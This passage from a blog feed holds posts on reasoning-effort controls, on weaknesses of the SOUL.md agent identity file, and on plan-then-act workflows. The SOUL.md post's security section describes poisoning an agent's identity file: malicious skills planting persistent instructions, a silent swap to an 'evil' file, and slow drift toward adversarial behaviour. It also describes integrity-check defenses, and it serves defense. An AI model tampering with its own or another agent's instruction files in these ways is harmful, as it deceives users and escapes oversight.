&lt;p&gt;&lt;strong&gt;Do users actually want thinking controls?&lt;/strong&gt; Cursor's "let it go" approach is the simplest and arguably the most popular. Most developers just want the right answer — they don't want to tune &lt;code&gt;reasoning_effort&lt;/code&gt; or pick thinking levels. Is explicit control a power-user feature that becomes noise for everyone else? Or does the 34.5% accuracy gap between short and long chains mean that &lt;a href="https://arxiv.org/abs/2505.17813" rel="noopener noreferrer"&gt;leaving it to chance&lt;/a&gt; is leaving quality on the table?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Can dynamic routing work at the framework level?&lt;/strong&gt; OpenClaw's ClawRouter scores requests on 15 dimensions with under 1ms latency. But it only sees the user's message, not the full context. A request that looks simple ("fix this") may require deep reasoning once the agent reads the codebase. Is pre-request routing fundamentally limited, or can it be made context-aware without adding latency?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What happens when thinking costs approach zero?&lt;/strong&gt; If inference costs drop 10x in the next two years (as they have in the past two), does the entire thinking-control problem dissolve? Or does the &lt;a href="https://arxiv.org/abs/2602.13517" rel="noopener noreferrer"&gt;overthinking problem&lt;/a&gt; — where more thinking actively degrades accuracy — mean that budget control stays important regardless of cost?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is "adaptive" just a better word for "uncontrolled"?&lt;/strong&gt; Anthropic's adaptive thinking and Windsurf's variable thinking both let the model decide how much to reason. This works when the model's judgment about task complexity is good. When it's wrong — overthinking a simple question or underthinking a subtle bug — there's no user-visible feedback loop. Are we trading explicit control for implicit trust?&lt;/p&gt;

&lt;p&gt;The frameworks that control thinking today are betting that reasoning is a resource worth managing. The frameworks that don't are betting that models will learn to manage it themselves. The &lt;a href="https://openwalrus.xyz/blog/agent-prompt-systems" rel="noopener noreferrer"&gt;research&lt;/a&gt; suggests both bets have merit — and neither has won yet.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://platform.claude.com/docs/en/build-with-claude/adaptive-thinking" rel="noopener noreferrer"&gt;Anthropic: Adaptive Thinking&lt;/a&gt; — how Claude decides when and how much to think&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://platform.claude.com/docs/en/build-with-claude/effort" rel="noopener noreferrer"&gt;Anthropic: Effort Parameter&lt;/a&gt; — soft guidance for reasoning depth&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://aider.chat/2024/09/26/architect.html" rel="noopener noreferrer"&gt;Aider: Architect/Editor Pattern&lt;/a&gt; — separating reasoning from editing&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2505.17813" rel="noopener noreferrer"&gt;Don't Overthink It&lt;/a&gt; — shorter chains are up to 34.5% more accurate&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2507.02076" rel="noopener noreferrer"&gt;Reasoning on a Budget&lt;/a&gt; — comprehensive survey of adaptive test-time compute&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2412.18547" rel="noopener noreferrer"&gt;TALE: Token-Budget-Aware Reasoning&lt;/a&gt; — 67% token cost reduction via self-budgeting&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://nousresearch.com/measuring-thinking-efficiency-in-reasoning-models-the-missing-benchmark/" rel="noopener noreferrer"&gt;Nous Research: Thinking Efficiency&lt;/a&gt; — open vs closed model token efficiency&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/BlockRunAI/ClawRouter" rel="noopener noreferrer"&gt;ClawRouter&lt;/a&gt; — OpenClaw's 15-dimension request scorer&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/thinking-control" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>SOUL.md: brilliant idea, brittle implementation</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:54:03 +0000</pubDate>
      <link>https://forem.com/crabtalk/soulmd-brilliant-idea-brittle-implementation-2941</link>
      <guid>https://forem.com/crabtalk/soulmd-brilliant-idea-brittle-implementation-2941</guid>
      <description>&lt;p&gt;OpenClaw's SOUL.md gave agents a personality by writing identity into a markdown file. With 180K+ GitHub stars and a thriving template ecosystem — from &lt;a href="https://github.com/thedaviddias/souls-directory" rel="noopener noreferrer"&gt;curated directories&lt;/a&gt; to &lt;a href="https://www.crewclaw.com/blog/soul-md-create-ai-agent" rel="noopener noreferrer"&gt;generator tools&lt;/a&gt; — the idea clearly resonates. But the implementation has cracks: silent loading failures, context window competition, compaction amnesia, and a growing attack surface.&lt;/p&gt;

&lt;p&gt;We dug into how SOUL.md works, where it breaks, and what it means for agent identity design.&lt;/p&gt;

&lt;h2&gt;
  
  
  What SOUL.md is
&lt;/h2&gt;

&lt;p&gt;Peter Steinberger created SOUL.md because he wanted his agent to sound like a friend, not a customer service bot. In an interview on the &lt;a href="https://lexfridman.com/peter-steinberger-transcript" rel="noopener noreferrer"&gt;Lex Fridman Podcast (#491)&lt;/a&gt;, he described instructing his agent to "write your own agents.md, give yourself a name" — letting the agent partially self-define its character.&lt;/p&gt;

&lt;p&gt;The result is a markdown file with three sections:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Core Truths&lt;/strong&gt; — fundamental beliefs and principles ("be genuinely helpful," "have opinions," "allowed to disagree")&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Boundaries&lt;/strong&gt; — hard limits on behavior ("be careful with external actions like emails; be bold with internal actions like reading/organizing")&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The Vibe&lt;/strong&gt; — voice, tone, quirks ("like a senior engineer who has seen it all; direct, slightly weary, but supportive")&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;SOUL.md is part of a broader file ecosystem: STYLE.md for voice patterns, SKILL.md for capabilities, MEMORY.md for session continuity, plus data/ and examples/ directories for calibration material.&lt;/p&gt;

&lt;p&gt;Technically, OpenClaw loads SOUL.md as a bootstrap file into the system prompt at session start. Per-file limit: 20,000 characters. Total bootstrap budget: 150,000 characters. The injection happens before any user messages, giving SOUL.md favorable positioning in the model's attention — but at a permanent cost to available context.&lt;/p&gt;
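&lt;p&gt;The budget arithmetic can be sketched directly. The per-file and total limits come from the paragraph above; the truncation policy is an assumption — OpenClaw may skip oversized files rather than truncate them:&lt;/p&gt;

```python
# Bootstrap budget sketch: 20,000 chars per file, 150,000 chars total,
# files injected in order until the budget runs out. Truncation (rather
# than skipping) is an assumption made for illustration.
PER_FILE_LIMIT = 20_000
TOTAL_BUDGET = 150_000

def build_bootstrap(files: dict) -> str:
    """files maps filename -> contents, in injection order."""
    parts, remaining = [], TOTAL_BUDGET
    for name, text in files.items():
        chunk = text[:PER_FILE_LIMIT][:remaining]
        if chunk:
            parts.append(f"# {name}\n{chunk}")
            remaining -= len(chunk)
    return "\n\n".join(parts)
```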

&lt;h2&gt;
  
  
  The adoption signal
&lt;/h2&gt;

&lt;p&gt;The ecosystem is real:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://github.com/aaronjmars/soul.md" rel="noopener noreferrer"&gt;aaronjmars/soul.md&lt;/a&gt; (189 stars) provides templates and structure guides&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/thedaviddias/souls-directory" rel="noopener noreferrer"&gt;souls-directory&lt;/a&gt; (68 stars) curates personality templates&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.crewclaw.com/blog/soul-md-create-ai-agent" rel="noopener noreferrer"&gt;CrewClaw&lt;/a&gt; generates SOUL.md for any role with pre-built templates&lt;/li&gt;
&lt;li&gt;Multiple DEV Community guides walk developers through configuration&lt;/li&gt;
&lt;li&gt;A viral Reddit thread produced configurations ranging from "lengthy legal contract-style" to "Gen Z-style roleplay scripts"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This isn't a niche feature. OpenClaw has 180,000+ GitHub stars, making SOUL.md a de facto standard for its user base.&lt;/p&gt;

&lt;h2&gt;
  
  
  What SOUL.md gets right
&lt;/h2&gt;

&lt;p&gt;The design has genuine strengths:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Plain markdown.&lt;/strong&gt; No special syntax, no YAML schema, no build step. Anyone who can write a README can write a SOUL.md. It's git-diffable, editor-friendly, and works with any LLM that processes text.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Addresses a real gap.&lt;/strong&gt; Agents without identity constraints are generic — they sound like documentation, not collaborators. Developers who customize SOUL.md consistently report that it transforms their agent from "chatbot" to "partner."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Specificity over generality.&lt;/strong&gt; The &lt;a href="https://github.com/aaronjmars/soul.md" rel="noopener noreferrer"&gt;soul.md project&lt;/a&gt; emphasizes contradictions over coherence and real opinions over safe positions — "because that's what makes you identifiably you." This mirrors how actual personalities work: humans aren't consistent, and forcing consistency makes agents feel synthetic.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Community-driven iteration.&lt;/strong&gt; The template ecosystem lets developers learn from each other's configurations. The &lt;a href="https://dev.to/techfind777/i-tested-100-soulmd-configurations-heres-what-actually-works-hoi"&gt;DEV Community study&lt;/a&gt; that tested 100 configurations found concrete patterns: specificity outperforms abstract rules by 23% on consistency.&lt;/p&gt;

&lt;h2&gt;
  
  
  Five ways SOUL.md breaks
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Silent loading failures
&lt;/h3&gt;

&lt;p&gt;SOUL.md fails silently in several documented ways. Per the &lt;a href="https://vpn07.com/en/blog/2026-openclaw-soul-md-fix-personality-file-not-loading.html" rel="noopener noreferrer"&gt;OpenClaw troubleshooting guide&lt;/a&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Files placed in &lt;code&gt;agentDir&lt;/code&gt; instead of &lt;code&gt;workspace&lt;/code&gt; are ignored&lt;/li&gt;
&lt;li&gt;The Ollama provider using &lt;code&gt;openai-completions&lt;/code&gt; format skips bootstrap files entirely&lt;/li&gt;
&lt;li&gt;Non-UTF-8 encoding causes silent skipping&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;USER.md&lt;/code&gt; leaks to non-owner senders&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When SOUL.md fails to load, there's no error, no warning, no indication. The agent just acts like its default self. Developers debug for hours before discovering the file was never read.&lt;/p&gt;
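&lt;p&gt;A defensive preflight catches the two most common failures from the list above — wrong directory and bad encoding — and says so out loud. A minimal sketch; paths and messages are illustrative:&lt;/p&gt;

```python
# Preflight check in the spirit of the failure list above: verify the
# file is in the directory the runtime actually reads, and that it is
# valid UTF-8. Returns human-readable problems instead of failing silently.
from pathlib import Path

def check_soul(workspace: Path) -> list:
    problems = []
    soul = workspace / "SOUL.md"
    if not soul.exists():
        problems.append("SOUL.md not found in workspace (agentDir is ignored)")
        return problems
    try:
        soul.read_bytes().decode("utf-8")
    except UnicodeDecodeError:
        problems.append("SOUL.md is not UTF-8; it will be silently skipped")
    return problems
```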

&lt;h3&gt;
  
  
  2. Subagent sessions don't load it
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://github.com/openclaw/openclaw/issues/24852" rel="noopener noreferrer"&gt;GitHub Issue #24852&lt;/a&gt;: subagent sessions spawned via &lt;code&gt;sessions_spawn&lt;/code&gt; only load AGENTS.md and TOOLS.md. SOUL.md was excluded by a &lt;code&gt;MINIMAL_BOOTSTRAP_ALLOWLIST&lt;/code&gt; in compiled JavaScript. Specialized agents couldn't fulfill their roles because they lacked identity definitions. Fixed in &lt;a href="https://github.com/openclaw/openclaw/pull/24979" rel="noopener noreferrer"&gt;PR #24979&lt;/a&gt;, but the bug was live for months.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Compaction amnesia
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://github.com/openclaw/openclaw/issues/17727" rel="noopener noreferrer"&gt;GitHub Issue #17727&lt;/a&gt;: after automatic session compaction (which summarizes conversation history to save context), agents lose awareness of SOUL.md. The compacted summary references rules abstractly, but the agent no longer has the full rule text. This causes behavioral regression — agents skip verification steps and ignore operational constraints they were following minutes earlier.&lt;/p&gt;

&lt;p&gt;This is the deepest problem with static identity files. Identity isn't just about knowing &lt;em&gt;what&lt;/em&gt; the rules are — it's about the model having the actual text in its attention window. Compaction destroys that. (We explored this tension in &lt;a href="https://openwalrus.xyz/blog/agent-prompt-systems" rel="noopener noreferrer"&gt;how instruction files decay from MVP to production&lt;/a&gt;.)&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Context window competition
&lt;/h3&gt;

&lt;p&gt;A 1,500-word SOUL.md consumes roughly 2,000 tokens — tokens that could go to reasoning, tool results, or conversation history. The tradeoff is measurable:&lt;/p&gt;

&lt;p&gt;An &lt;a href="https://www.marktechpost.com/2026/02/25/new-eth-zurich-study-proves-your-ai-coding-agents-are-failing-because-your-agents-md-files-are-too-detailed/" rel="noopener noreferrer"&gt;ETH Zurich study&lt;/a&gt; on AGENTS.md (which generalizes to any static instruction file) found that human-written context files improve task completion by only &lt;strong&gt;+4%&lt;/strong&gt; on average. LLM-generated files &lt;em&gt;reduced&lt;/em&gt; performance by ~3% and increased costs by 14-22%.&lt;/p&gt;

&lt;p&gt;The &lt;a href="https://dev.to/techfind777/i-tested-100-soulmd-configurations-heres-what-actually-works-hoi"&gt;DEV Community study&lt;/a&gt; found the optimal SOUL.md is &lt;strong&gt;800-1,200 words&lt;/strong&gt;. Beyond 2,000 words, contradictory instructions cause diminishing returns. Personality traits cost 2-3% in raw task performance.&lt;/p&gt;

&lt;p&gt;Static configurations also decay: configs that aren't updated weekly underperform by 19% after the first month.&lt;/p&gt;
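&lt;p&gt;The arithmetic behind these numbers is simple enough to check: English prose runs at roughly 4/3 tokens per word (which is how 1,500 words becomes ~2,000 tokens), and every one of those tokens is paid on every request. A small sketch using the word bands from the studies above:&lt;/p&gt;

```python
# Context-cost arithmetic from the paragraphs above: ~4/3 tokens per word
# of English prose, plus the word-count bands reported by the cited studies.
def soul_token_cost(word_count: int) -> int:
    return round(word_count * 4 / 3)  # e.g. 1,500 words -> ~2,000 tokens

def length_verdict(word_count: int) -> str:
    if word_count < 800:
        return "under the studied optimum"
    if word_count <= 1200:
        return "in the 800-1,200 word sweet spot"
    if word_count <= 2000:
        return "above optimum; diminishing returns"
    return "past 2,000 words; contradictions likely"
```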

&lt;h3&gt;
  
  
  5. Security attack surface
&lt;/h3&gt;

&lt;p&gt;SOUL.md is a persistence mechanism for attackers. Per the &lt;a href="https://www.mmntm.net/articles/openclaw-soul-evil" rel="noopener noreferrer"&gt;MMNTM "Soul &amp;amp; Evil" analysis&lt;/a&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Malicious &lt;a href="https://snyk.io/blog/toxicskills-malicious-ai-agent-skills-clawhub/" rel="noopener noreferrer"&gt;ClawHub&lt;/a&gt; skills write instructions into SOUL.md during installation; uninstalling the skill leaves modifications intact&lt;/li&gt;
&lt;li&gt;VirusTotal found &lt;strong&gt;341 malicious skills&lt;/strong&gt; on ClawHub, with 335 targeting macOS password theft&lt;/li&gt;
&lt;li&gt;The built-in &lt;code&gt;soul-evil&lt;/code&gt; hook can swap SOUL.md with SOUL_EVIL.md without user notification&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;"Ship of Theseus" evasion&lt;/strong&gt;: sophisticated attackers make incremental, benign-seeming edits over hundreds of sessions, gradually drifting the soul toward adversarial behavior&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The recommended defense: treat SOUL.md as code, not data — file integrity monitoring, read-only permissions during runtime, and an immutable &lt;code&gt;CORP_POLICY.md&lt;/code&gt; that overrides SOUL.md. But this undermines the simplicity that made SOUL.md appealing in the first place. (For a deeper look at agent security boundaries, see our &lt;a href="https://openwalrus.xyz/blog/agent-sandbox-permissions" rel="noopener noreferrer"&gt;sandbox and permissions research&lt;/a&gt;.)&lt;/p&gt;
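&lt;p&gt;The file-integrity half of that defense is a few lines: record a hash at a trusted point, refuse to start a session if the file has drifted. A minimal sketch, not the tooling the analysis recommends:&lt;/p&gt;

```python
# "Treat SOUL.md as code": minimal integrity monitoring. Record a SHA-256
# digest at install/review time, then compare before each session. This
# catches both skill-injected edits and gradual "Ship of Theseus" drift.
import hashlib
from pathlib import Path

def fingerprint(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def verify_soul(path: Path, trusted_digest: str) -> bool:
    """True if SOUL.md still matches the digest recorded at a trusted point."""
    return fingerprint(path) == trusted_digest
```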

&lt;h2&gt;
  
  
  The measurement problem
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The evidence on static identity files is sobering:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Finding&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Human-written instruction files: &lt;strong&gt;+4%&lt;/strong&gt; task completion&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.marktechpost.com/2026/02/25/new-eth-zurich-study-proves-your-ai-coding-agents-are-failing-because-your-agents-md-files-are-too-detailed/" rel="noopener noreferrer"&gt;ETH Zurich study&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LLM-generated instruction files: &lt;strong&gt;-3%&lt;/strong&gt; performance, +14-22% cost&lt;/td&gt;
&lt;td&gt;Same study&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Optimal length: &lt;strong&gt;800-1,200 words&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://dev.to/techfind777/i-tested-100-soulmd-configurations-heres-what-actually-works-hoi"&gt;100-config study&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Personality traits cost &lt;strong&gt;2-3%&lt;/strong&gt; raw task performance&lt;/td&gt;
&lt;td&gt;Same study&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Static configs decay &lt;strong&gt;19%&lt;/strong&gt; after one month without updates&lt;/td&gt;
&lt;td&gt;Same study&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agents learn to &lt;em&gt;state&lt;/em&gt; values without &lt;em&gt;applying&lt;/em&gt; them&lt;/td&gt;
&lt;td&gt;Community observation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;That last point deserves emphasis. An agent can read "exhaust all options before pivoting" from SOUL.md and then immediately recommend pivoting on the first obstacle. The model learned the &lt;em&gt;language&lt;/em&gt; of the personality without internalizing the &lt;em&gt;behavior&lt;/em&gt;. Static text can't enforce runtime behavior — it can only suggest it.&lt;/p&gt;
&lt;h2&gt;
  
  
  The alternative: identity as graph
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;OpenWalrus takes a different approach. Instead of a static file that occupies permanent context, identity is an entity type in a &lt;a href="https://openwalrus.xyz/blog/graph-vector-hybrid-memory" rel="noopener noreferrer"&gt;temporal knowledge graph&lt;/a&gt;:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Agent --has_trait--&amp;gt; "prefers direct communication"
Agent --has_boundary--&amp;gt; "never send emails without confirmation"
Agent --has_style--&amp;gt; "uses chess metaphors"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each trait has temporal metadata (when it was established, when it was last confirmed), relationship edges (which user interactions reinforced it), and semantic embeddings (so the agent can &lt;em&gt;search&lt;/em&gt; its own identity rather than relying on the model holding everything in attention).&lt;/p&gt;
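&lt;p&gt;A minimal shape for such a store: each trait is a node with temporal metadata that can be confirmed, searched, or retired independently. Field names are illustrative — OpenWalrus's actual schema lives in its graph store, and real recall would use embeddings rather than substring match:&lt;/p&gt;

```python
# Identity-as-graph in miniature: traits as timestamped nodes that can be
# confirmed, queried, or selectively forgotten. Illustrative field names;
# `recall` uses substring match as a stand-in for semantic search.
from dataclasses import dataclass, field
import time

@dataclass
class Trait:
    relation: str          # e.g. "has_boundary"
    statement: str         # e.g. "never send emails without confirmation"
    established_at: float = field(default_factory=time.time)
    last_confirmed: float = field(default_factory=time.time)

    def confirm(self):
        self.last_confirmed = time.time()

class Identity:
    def __init__(self):
        self.traits = []

    def add(self, relation, statement):
        self.traits.append(Trait(relation, statement))

    def recall(self, query):
        q = query.lower()
        return [t for t in self.traits if q in t.statement.lower()]

    def forget(self, statement):
        # Selective forgetting: drop one trait without rewriting the rest.
        self.traits = [t for t in self.traits if t.statement != statement]
```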

&lt;p&gt;The tradeoffs are real. You lose &lt;code&gt;cat SOUL.md&lt;/code&gt; — the ability to open a file and read the agent's personality in plain text. You lose git-diffable identity changes. You lose the simplicity of &lt;code&gt;echo "prefer tabs" &amp;gt;&amp;gt; SOUL.md&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;What you gain:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Context efficiency&lt;/strong&gt; — identity surfaces on-demand via &lt;code&gt;recall&lt;/code&gt;, not as a permanent context tax&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Temporal awareness&lt;/strong&gt; — the graph knows &lt;em&gt;when&lt;/em&gt; a trait was established and can track drift&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Selective forgetting&lt;/strong&gt; — you can remove a trait without rewriting the whole file&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Searchability&lt;/strong&gt; — "what does the agent believe about error handling?" is a query, not a grep&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compaction survival&lt;/strong&gt; — identity lives in the graph, not in the context window that gets compacted&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We detailed this architecture in &lt;a href="https://openwalrus.xyz/blog/graph-vector-hybrid-memory" rel="noopener noreferrer"&gt;how OpenWalrus agents remember&lt;/a&gt; and the &lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;research survey&lt;/a&gt; that informed it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;p&gt;SOUL.md got the diagnosis right — agents need identity — but the treatment has side effects. That leaves several questions we don't have clean answers to yet:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is identity even the right abstraction?&lt;/strong&gt; SOUL.md assumes an agent &lt;em&gt;is&lt;/em&gt; something — it has values, a voice, boundaries. But maybe agents should be more like tools with configurable behavior than entities with personalities. The &lt;a href="https://www.anthropic.com/engineering/effective-context-engineering-for-ai-agents" rel="noopener noreferrer"&gt;context engineering&lt;/a&gt; research suggests that surfacing relevant context on demand outperforms front-loading identity into the system prompt. If that's true, identity might be an implementation detail of good retrieval, not a first-class concept.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Can identity survive compaction without a database?&lt;/strong&gt; The graph approach trades &lt;code&gt;cat&lt;/code&gt;-ability for queryability. But is there a middle path — a file-based format that a compaction algorithm knows to preserve? Or does any file-based identity inevitably degrade when the context window fills up?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How much personality actually helps?&lt;/strong&gt; The ETH Zurich study found +4% for human-written instruction files. The DEV Community study found personality traits cost 2-3% in raw performance. Is the net effect positive, negative, or noise? And does it depend entirely on the task — maybe personality helps in conversational agents but hurts in code generation?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Who owns the soul?&lt;/strong&gt; SOUL.md is writable by the agent, by skills, by the user, and by attackers. A &lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;compact core with an open extension surface&lt;/a&gt; avoids the configuration bloat that SOUL.md + STYLE.md + SKILL.md + MEMORY.md creates — but any identity system needs to answer who gets write access and what happens when edits conflict.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does the file format ecosystem converge or fragment?&lt;/strong&gt; SOUL.md, CLAUDE.md, AGENTS.md, .cursorrules — each tool has its own identity file. The &lt;a href="https://openwalrus.xyz/blog/agent-prompt-systems" rel="noopener noreferrer"&gt;instruction file landscape&lt;/a&gt; is already fragmented. Does one format win, or does every agent framework end up with its own personality spec forever?&lt;/p&gt;

&lt;p&gt;The brilliance of SOUL.md was asking the right question. The answer is still open.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://lexfridman.com/peter-steinberger-transcript" rel="noopener noreferrer"&gt;Lex Fridman Podcast #491&lt;/a&gt; — Peter Steinberger on creating SOUL.md and why agents need personality&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.marktechpost.com/2026/02/25/new-eth-zurich-study-proves-your-ai-coding-agents-are-failing-because-your-agents-md-files-are-too-detailed/" rel="noopener noreferrer"&gt;ETH Zurich: Does AGENTS.md Actually Help?&lt;/a&gt; — the study that found +4% for human-written instruction files and -3% for LLM-generated ones&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.anthropic.com/engineering/effective-context-engineering-for-ai-agents" rel="noopener noreferrer"&gt;Anthropic: Effective Context Engineering for AI Agents&lt;/a&gt; — why on-demand retrieval beats front-loading the system prompt&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.mmntm.net/articles/openclaw-soul-evil" rel="noopener noreferrer"&gt;MMNTM: Soul &amp;amp; Evil&lt;/a&gt; — security analysis of SOUL.md as an attack surface&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://snyk.io/blog/toxicskills-malicious-ai-agent-skills-clawhub/" rel="noopener noreferrer"&gt;Snyk: ToxicSkills on ClawHub&lt;/a&gt; — 341 malicious skills targeting SOUL.md persistence&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/aaronjmars/soul.md" rel="noopener noreferrer"&gt;soul.md template project&lt;/a&gt; — the community template repo with structure guides&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.blueoctopustechnology.com/blog/claude-md-vs-soul-md-vs-skill-md" rel="noopener noreferrer"&gt;CLAUDE.md vs SOUL.md vs SKILL.md&lt;/a&gt; — comparison of identity file approaches across ecosystems&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/soul-md-adoption" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Plans vs tasks: how AI agents think before they act</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:53:20 +0000</pubDate>
      <link>https://forem.com/crabtalk/plans-vs-tasks-how-ai-agents-think-before-they-act-9bl</link>
      <guid>https://forem.com/crabtalk/plans-vs-tasks-how-ai-agents-think-before-they-act-9bl</guid>
      <description>&lt;p&gt;Every AI agent faces the same problem: given an open-ended goal, how do&lt;br&gt;
you avoid charging ahead in the wrong direction?&lt;/p&gt;

&lt;p&gt;The answer most production systems have converged on: &lt;strong&gt;separate planning&lt;br&gt;
from execution.&lt;/strong&gt; Analyze first, act second. Make the plan visible and&lt;br&gt;
editable before committing to it. This turns out to be more than a UX&lt;br&gt;
nicety — it's the difference between an agent that's useful on complex&lt;br&gt;
tasks and one that confidently does the wrong thing.&lt;/p&gt;

&lt;p&gt;We surveyed how five major coding agents implement this separation —&lt;br&gt;
Claude Code, Cursor, Devin, Windsurf, and GitHub Copilot — and what&lt;br&gt;
the emerging patterns mean for how walrus should think about plans and&lt;br&gt;
tasks.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why planning matters
&lt;/h2&gt;

&lt;p&gt;The naive agent loop is: receive a goal → take action → repeat until&lt;br&gt;
done. This works for simple tasks. It fails badly on anything requiring&lt;br&gt;
multi-step coordination — the agent makes irreversible edits early,&lt;br&gt;
paints itself into corners, or misunderstands scope and rewrites the&lt;br&gt;
wrong thing.&lt;/p&gt;

&lt;p&gt;Research on SWE-bench shows this concretely. &lt;a href="https://refact.ai/blog/2025/sota-on-swe-bench-lite-open-source-refact-ai/" rel="noopener noreferrer"&gt;Refact.ai's top-ranked&lt;br&gt;
approach&lt;/a&gt;&lt;br&gt;
includes an explicit &lt;code&gt;deep_analysis()&lt;/code&gt; reasoning step before applying&lt;br&gt;
changes. Their workflow:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Describe the problem&lt;/li&gt;
&lt;li&gt;Investigate the repo&lt;/li&gt;
&lt;li&gt;Create and run a problem reproduction script&lt;/li&gt;
&lt;li&gt;Make a plan, then apply changes&lt;/li&gt;
&lt;li&gt;Run tests, evaluate, repeat&lt;/li&gt;
&lt;/ol&gt;
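&lt;p&gt;The steps above can be sketched as a plan-then-act loop. The helper functions are stand-ins for real repo investigation, editing, and test tooling; nothing here is Refact.ai's code:&lt;/p&gt;

```python
# Toy skeleton of the workflow above. Helpers are stand-ins for real
# repo investigation, editing, and test tooling.
def investigate_repo(issue):
    return {"issue": issue, "files": ["auth.py"]}  # step 2: explore the repo

def make_plan(context):
    # step 4a: explicit analysis before any edits
    return ["reproduce the bug", "patch auth.py", "run the test suite"]
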